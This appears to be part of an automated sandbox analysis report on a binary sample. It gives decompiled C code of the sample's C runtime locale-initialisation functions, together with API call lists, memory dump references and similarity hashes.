                • ___getlocaleinfo.LIBCMT ref: 00EB9606
                • ___getlocaleinfo.LIBCMT ref: 00EB9620
                • ___getlocaleinfo.LIBCMT ref: 00EB9637
                • ___getlocaleinfo.LIBCMT ref: 00EB964E
                • ___getlocaleinfo.LIBCMT ref: 00EB9665
                • ___getlocaleinfo.LIBCMT ref: 00EB967F
                • ___getlocaleinfo.LIBCMT ref: 00EB9696
                • ___getlocaleinfo.LIBCMT ref: 00EB96AD
                • ___getlocaleinfo.LIBCMT ref: 00EB96C4
                • ___getlocaleinfo.LIBCMT ref: 00EB96DE
                • ___getlocaleinfo.LIBCMT ref: 00EB96F5
                • ___getlocaleinfo.LIBCMT ref: 00EB970C
                • ___getlocaleinfo.LIBCMT ref: 00EB9723
                • ___getlocaleinfo.LIBCMT ref: 00EB973D
                • ___getlocaleinfo.LIBCMT ref: 00EB9754
                • ___getlocaleinfo.LIBCMT ref: 00EB976B
                • ___getlocaleinfo.LIBCMT ref: 00EB9785
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                • String ID:
                • API String ID: 2187842456-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00EA26FB(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                				intOrPtr _t86;
                				char _t153;
                				void* _t167;
                				void* _t180;
                				void* _t187;
                				char* _t193;
                				intOrPtr* _t196;
                				signed int _t199;
                				signed int _t200;
                				signed int _t201;
                				signed int _t202;
                				signed int _t203;
                				signed int _t204;
                				signed int _t205;
                				signed int _t206;
                				signed int _t207;
                				signed int _t208;
                				signed int _t209;
                				signed int _t210;
                				signed int _t211;
                				signed int _t212;
                				signed int _t213;
                				signed int _t214;
                				signed int _t215;
                				signed int _t216;
                				signed int _t217;
                				signed int _t218;
                				intOrPtr* _t219;
                				char* _t221;
                				void* _t222;
                				void* _t223;
                
                				_t180 = __ebx;
                				 *__eax =  *__eax + __eax;
                				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                				asm("adc eax, 0xec458d57");
                				_push(1);
                				_push(__eax);
                				_t199 = E00EB4CB1(__ebx, __edi, __esi);
                				_t200 = _t199 | E00EB4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
                				_t201 = _t200 | E00EB4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
                				_t202 = _t201 | E00EB4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
                				_t86 =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
                				 *((intOrPtr*)(_t222 - 0xc)) = _t86;
                				_push(_t86);
                				_push(0x18);
                				asm("sbb [edi-0x73], dl");
                				_t223 = _t222 + 1;
                				asm("in al, dx");
                				_push(1);
                				_push(_t86);
                				_t203 = _t202 | E00EB4CB1(__ebx, __edi, _t202);
                				_t204 = _t203 | E00EB4CB1(__ebx, __edi, _t203, _t223 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x20);
                				_t205 = _t204 | E00EB4CB1(__ebx, __edi, _t204, _t223 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x24);
                				_t206 = _t205 | E00EB4CB1(__ebx, __edi, _t205, _t223 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t223 + 8)) + 0x28);
                				_t207 = _t206 | E00EB4CB1(__ebx, __edi, _t206, _t223 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t223 + 8)) + 0x29);
                				_t208 = _t207 | E00EB4CB1(__ebx, __edi, _t207, _t223 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t223 + 8)) + 0x2a);
                				_t209 = _t208 | E00EB4CB1(__ebx, __edi, _t208, _t223 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t223 + 8)) + 0x2b);
                				_t210 = _t209 | E00EB4CB1(__ebx, __edi, _t209, _t223 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t223 + 8)) + 0x2c);
                				_t211 = _t210 | E00EB4CB1(__ebx, __edi, _t210, _t223 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t223 + 8)) + 0x2d);
                				_t212 = _t211 | E00EB4CB1(__ebx, __edi, _t211, _t223 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t223 + 8)) + 0x2e);
                				_t213 = _t212 | E00EB4CB1(__ebx, __edi, _t212, _t223 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t223 + 8)) + 0x2f);
                				_t214 = _t213 | E00EB4CB1(__ebx, __edi, _t213, _t223 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t223 + 8)) + 0x38);
                				_t215 = _t214 | E00EB4CB1(__ebx, __edi, _t214, _t223 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t223 + 8)) + 0x3c);
                				_t216 = _t215 | E00EB4CB1(__ebx, __edi, _t215, _t223 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t223 + 8)) + 0x40);
                				_t217 = _t216 | E00EB4CB1(__ebx, __edi, _t216, _t223 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t223 + 8)) + 0x44);
                				_t218 = _t217 | E00EB4CB1(__ebx, __edi, _t217, _t223 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x48);
                				if((E00EB4CB1(__ebx, __edi, _t218, _t223 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x4c) | _t218) == 0) {
                					_t193 =  *((intOrPtr*)( *((intOrPtr*)(_t223 - 0xc))));
                					while( *_t193 != 0) {
                						_t153 =  *_t193;
                						if(_t153 < 0x30 || _t153 > 0x39) {
                							if(_t153 != 0x3b) {
                								goto L9;
                							} else {
                								_t221 = _t193;
                								do {
                									 *_t221 =  *((intOrPtr*)(_t221 + 1));
                									_t221 = _t221 + 1;
                								} while ( *_t221 != 0);
                								continue;
                							}
                							L18:
                							_t187 = 0xffffffffffffffff;
                							if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
                								asm("lock xadd [edx], eax");
                							}
                							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
                								asm("lock xadd [eax], ecx");
                								if(_t187 == 1) {
                									E00EB2248( *((intOrPtr*)(_t180 + 0x84)));
                									E00EB2248( *((intOrPtr*)(_t180 + 0x78)));
                								}
                							}
                							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t223 - 4));
                							_t167 = 0;
                							 *((intOrPtr*)(_t180 + 0x80)) = _t196;
                							 *((intOrPtr*)(_t180 + 0x84)) = _t219;
                							goto L24;
                						} else {
                							 *_t193 = _t153 - 0x30;
                							L9:
                							_t193 = _t193 + 1;
                						}
                					}
                					_t219 =  *((intOrPtr*)(_t223 + 8));
                					_t196 =  *((intOrPtr*)(_t223 - 8));
                					 *_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
                					 *((intOrPtr*)(_t219 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
                					 *((intOrPtr*)(_t219 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
                					 *((intOrPtr*)(_t219 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
                					 *((intOrPtr*)(_t219 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
                					 *((intOrPtr*)( *((intOrPtr*)(_t223 - 4)))) = 1;
                					if(_t196 != 0) {
                						 *_t196 = 1;
                					}
                					goto L18;
                				} else {
                					E00EB842D( *((intOrPtr*)(_t223 + 8)));
                					E00EB2248( *((intOrPtr*)(_t223 + 8)));
                					E00EB2248( *((intOrPtr*)(_t223 - 4)));
                					E00EB2248( *((intOrPtr*)(_t223 - 8)));
                					_t167 = 1;
                				}
                				L24:
                				return _t167;
                			}


                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB85D9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB85F0
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8607
                • ___getlocaleinfo.LIBCMT ref: 00EB861E
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 129311744-0
                • Opcode ID: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction ID: 5e4805bc4c9095b39d420b9809d2b337096e8ce33fadad232659a6ba9724dcb7
                • Opcode Fuzzy Hash: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction Fuzzy Hash: 8061E3B2D402087AEB20DBA8CC46FEF7BEC9B09B85F145510FB04FB1C2D5A4DA549A65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00EA67B8(void* __eax, void* __ebx, void* __edi, signed int __esi) {
                				char _t130;
                				void* _t144;
                				void* _t157;
                				void* _t162;
                				char* _t167;
                				intOrPtr* _t170;
                				signed int _t173;
                				signed int _t174;
                				signed int _t175;
                				signed int _t176;
                				signed int _t177;
                				signed int _t178;
                				signed int _t179;
                				signed int _t180;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				signed int _t184;
                				signed int _t185;
                				signed int _t186;
                				signed int _t187;
                				signed int _t188;
                				intOrPtr* _t189;
                				char* _t191;
                				void* _t192;
                				void* _t193;
                
                				_t157 = __ebx;
                				asm("sbb [edi-0x73], dl");
                				_t193 = _t192 + 1;
                				asm("in al, dx");
                				_push(1);
                				_t173 = __esi | E00EB4CB1(__ebx, __edi, __esi);
                				_t174 = _t173 | E00EB4CB1(__ebx, __edi, _t173, _t193 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x20);
                				_t175 = _t174 | E00EB4CB1(__ebx, __edi, _t174, _t193 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x24);
                				_t176 = _t175 | E00EB4CB1(__ebx, __edi, _t175, _t193 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t193 + 8)) + 0x28);
                				_t177 = _t176 | E00EB4CB1(__ebx, __edi, _t176, _t193 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t193 + 8)) + 0x29);
                				_t178 = _t177 | E00EB4CB1(__ebx, __edi, _t177, _t193 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t193 + 8)) + 0x2a);
                				_t179 = _t178 | E00EB4CB1(__ebx, __edi, _t178, _t193 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t193 + 8)) + 0x2b);
                				_t180 = _t179 | E00EB4CB1(__ebx, __edi, _t179, _t193 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t193 + 8)) + 0x2c);
                				_t181 = _t180 | E00EB4CB1(__ebx, __edi, _t180, _t193 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t193 + 8)) + 0x2d);
                				_t182 = _t181 | E00EB4CB1(__ebx, __edi, _t181, _t193 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t193 + 8)) + 0x2e);
                				_t183 = _t182 | E00EB4CB1(__ebx, __edi, _t182, _t193 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t193 + 8)) + 0x2f);
                				_t184 = _t183 | E00EB4CB1(__ebx, __edi, _t183, _t193 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t193 + 8)) + 0x38);
                				_t185 = _t184 | E00EB4CB1(__ebx, __edi, _t184, _t193 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t193 + 8)) + 0x3c);
                				_t186 = _t185 | E00EB4CB1(__ebx, __edi, _t185, _t193 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t193 + 8)) + 0x40);
                				_t187 = _t186 | E00EB4CB1(__ebx, __edi, _t186, _t193 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t193 + 8)) + 0x44);
                				_t188 = _t187 | E00EB4CB1(__ebx, __edi, _t187, _t193 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x48);
                				if((E00EB4CB1(__ebx, __edi, _t188, _t193 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x4c) | _t188) == 0) {
                					_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t193 - 0xc))));
                					while( *_t167 != 0) {
                						_t130 =  *_t167;
                						if(_t130 < 0x30 || _t130 > 0x39) {
                							if(_t130 != 0x3b) {
                								goto L8;
                							} else {
                								_t191 = _t167;
                								do {
                									 *_t191 =  *((intOrPtr*)(_t191 + 1));
                									_t191 = _t191 + 1;
                								} while ( *_t191 != 0);
                								continue;
                							}
                							L19:
                							if( *((intOrPtr*)(_t157 + 0x78)) != 0) {
                								asm("lock xadd [eax], ecx");
                								if(_t162 == 1) {
                									E00EB2248( *((intOrPtr*)(_t157 + 0x84)));
                									E00EB2248( *((intOrPtr*)(_t157 + 0x78)));
                								}
                							}
                							 *((intOrPtr*)(_t157 + 0x78)) =  *((intOrPtr*)(_t193 - 4));
                							_t144 = 0;
                							 *((intOrPtr*)(_t157 + 0x80)) = _t170;
                							 *((intOrPtr*)(_t157 + 0x84)) = _t189;
                							goto L23;
                						} else {
                							 *_t167 = _t130 - 0x30;
                							L8:
                							_t167 = _t167 + 1;
                						}
                					}
                					_t189 =  *((intOrPtr*)(_t193 + 8));
                					_t170 =  *((intOrPtr*)(_t193 - 8));
                					 *_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84))));
                					 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 4));
                					 *((intOrPtr*)(_t189 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 8));
                					 *((intOrPtr*)(_t189 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x30));
                					 *((intOrPtr*)(_t189 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x34));
                					 *((intOrPtr*)( *((intOrPtr*)(_t193 - 4)))) = 1;
                					if(_t170 != 0) {
                						 *_t170 = 1;
                					}
                					_t162 = 0xffffffffffffffff;
                					if( *((intOrPtr*)(_t157 + 0x80)) != 0) {
                						asm("lock xadd [edx], eax");
                					}
                					goto L19;
                				} else {
                					E00EB842D( *((intOrPtr*)(_t193 + 8)));
                					E00EB2248( *((intOrPtr*)(_t193 + 8)));
                					E00EB2248( *((intOrPtr*)(_t193 - 4)));
                					E00EB2248( *((intOrPtr*)(_t193 - 8)));
                					_t144 = 1;
                				}
                				L23:
                				return _t144;
                			}


                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 3394113687-0
                • Opcode ID: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction ID: 4e27bb8dbb8a41178c9b287f7ee973b7f07c85956efb9cb5f382097c7850fe64
                • Opcode Fuzzy Hash: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction Fuzzy Hash: 0051F3B2D401087AEB20DBA8CC46FEB7BEC9B09B85F145510FB04FB1C2D5A0DA509A65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00EA1110(void* __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
                				intOrPtr _t39;
                				intOrPtr _t40;
                				intOrPtr _t41;
                				intOrPtr _t42;
                				intOrPtr _t43;
                				signed int _t48;
                				signed int _t52;
                				void* _t72;
                				signed int _t74;
                				signed int _t79;
                				signed int _t80;
                				signed int _t94;
                				intOrPtr* _t99;
                				signed int _t101;
                				signed int _t102;
                				signed int _t103;
                				signed int _t104;
                				signed int _t105;
                				void* _t106;
                
                				_t95 = __edi;
                				if(__eflags == 0) {
                					_t99 =  *((intOrPtr*)(_t106 + 8));
                					_t39 =  *0xecee28; // 0xecee24
                					 *_t99 = _t39;
                					_t40 =  *0xecee2c; // 0xed0054
                					 *((intOrPtr*)(_t99 + 4)) = _t40;
                					_t41 =  *0xecee30; // 0xed0054
                					 *((intOrPtr*)(_t99 + 8)) = _t41;
                					_t42 =  *0xecee58; // 0xecee78
                					 *((intOrPtr*)(_t99 + 0x30)) = _t42;
                					_t43 =  *0xecee5c; // 0xed0058
                					 *((intOrPtr*)(_t99 + 0x34)) = _t43;
                					goto L13;
                				} else {
                					_t52 = E00EB22C8(__ecx, __edx, 4);
                					 *(_t106 - 0xc) = _t52;
                					if(_t52 == 0) {
                						L5:
                						E00EB2248( *((intOrPtr*)(_t106 + 8)));
                						E00EB2248( *(_t106 - 4));
                						_t48 =  *(_t106 - 8);
                					} else {
                						 *_t52 = __edi;
                						_t97 =  *0x00000160;
                						_t101 = E00EB4CB1(0xb0,  *0x00000160, __esi, _t106 - 0x14, 1,  *0x00000160, 0xe,  *((intOrPtr*)(_t106 + 8)));
                						_t102 = _t101 | E00EB4CB1(0xb0,  *0x00000160, _t101, _t106 - 0x14, 1, _t97, 0xf,  *((intOrPtr*)(_t106 + 8)) + 4);
                						 *(_t106 - 8) =  *((intOrPtr*)(_t106 + 8)) + 8;
                						_t103 = _t102 | E00EB4CB1(0xb0, _t97, _t102, _t106 - 0x14, 1, _t97, 0x10,  *((intOrPtr*)(_t106 + 8)) + 8);
                						_t104 = _t103 | E00EB4CB1(0xb0, _t97, _t103, _t106 - 0x14, 2, _t97, 0xe,  *((intOrPtr*)(_t106 + 8)) + 0x30);
                						if((E00EB4CB1(0xb0, _t97, _t104, _t106 - 0x14, 2, _t97, 0xf,  *((intOrPtr*)(_t106 + 8)) + 0x34) | _t104) == 0) {
                							_t94 =  *( *(_t106 - 8));
                							while(1) {
                								__eflags =  *_t94;
                								if( *_t94 == 0) {
                									break;
                								}
                								_t72 =  *_t94;
                								__eflags = _t72 - 0x30;
                								if(_t72 < 0x30) {
                									L22:
                									__eflags = _t72 - 0x3b;
                									if(_t72 != 0x3b) {
                										goto L10;
                									} else {
                										_t105 = _t94;
                										do {
                											 *_t105 =  *(_t105 + 1);
                											_t105 = _t105 + 1;
                											__eflags =  *_t105;
                										} while ( *_t105 != 0);
                										continue;
                									}
                									L27:
                								} else {
                									__eflags = _t72 - 0x39;
                									if(_t72 > 0x39) {
                										goto L22;
                									} else {
                										_t74 = _t72 - 0x30;
                										__eflags = _t74;
                										 *_t94 = _t74;
                										L10:
                										_t94 = _t94 + 1;
                										__eflags = _t94;
                									}
                								}
                							}
                							_t95 =  *(_t106 - 0xc);
                							_t99 =  *((intOrPtr*)(_t106 + 8));
                							L13:
                							_t79 =  *(_t106 - 4);
                							 *_t79 = 1;
                							__eflags = _t95;
                							if(_t95 != 0) {
                								 *_t95 = 1;
                							}
                							_t80 = _t79 | 0xffffffff;
                							__eflags =  *0x0000012C;
                							if( *0x0000012C != 0) {
                								asm("lock xadd [edx], eax");
                							}
                							__eflags =  *0x00000128;
                							if( *0x00000128 != 0) {
                								asm("lock xadd [eax], ecx");
                								__eflags = _t80 == 1;
                								if(_t80 == 1) {
                									E00EB2248( *0x00000128);
                									E00EB2248( *0x00000134);
                								}
                							}
                							 *0x00000128 =  *(_t106 - 4);
                							_t48 = 0;
                							__eflags = 0;
                							 *0x0000012C = _t95;
                							 *((intOrPtr*)(0x134)) = _t99;
                						} else {
                							E00EB8902( *((intOrPtr*)(_t106 + 8)));
                							 *(_t106 - 8) =  *(_t106 - 8) | 0xffffffff;
                							goto L5;
                						}
                					}
                				}
                				return _t48;
                				goto L27;
                			}






















                APIs
                • __malloc_crt.LIBCMT ref: 00EB89F9
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • ___getlocaleinfo.LIBCMT ref: 00EB8A1E
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8A35
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
